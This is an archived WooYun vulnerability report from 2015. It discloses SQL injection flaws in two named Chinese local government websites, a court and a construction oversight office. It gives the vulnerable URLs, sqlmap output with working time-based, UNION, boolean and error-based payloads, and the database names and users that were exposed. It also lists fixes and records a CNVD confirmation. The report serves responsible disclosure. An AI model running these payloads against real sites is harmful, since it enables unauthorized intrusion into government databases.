乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-08: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经确认,细节仅向厂商公开 2015-07-20: 细节向核心白帽子及相关领域专家公开 2015-07-30: 细节向普通白帽子公开 2015-08-09: 细节向实习白帽子公开 2015-08-24: 细节向公众公开
SQL注射漏洞之地方政府网站
1. 石狮市人民法院网站
http://www.ssfy.gov.cn/infoshow.php?id=1073 - 注入参数id,时间盲注sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1073 AND (SELECT * FROM (SELECT(SLEEP(5)))VquV) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: id=-6784 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787171,0x5445546c6a65704f4572,0x7176627171)-- ---[02:12:27] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12hostname: '156203.gzonet.com'current database: 'ssfy'current user: 'ssfy_f@localhost'
2. 芜湖市建筑工程质量监督站
http://www.whzj.gov.cn/news.php?id=1295 --注入参数id 布尔型盲注sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1295 AND 4333=4333 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1295 AND (SELECT 8085 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(8085=8085,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1295 AND (SELECT * FROM (SELECT(SLEEP(5)))Mhor)---[02:14:00] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0current database: 'hdm0780116_db'current user: 'hdm0780116@%'
PS: 只测试,不深入
1. 使用预编译语句2. 使用存储过程3. 检查数据类型4. 使用安全函数
危害等级:高
漏洞Rank:10
确认时间:2015-07-10 11:41
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给对应分中心,由其后续协调网站管理单位处置。
暂无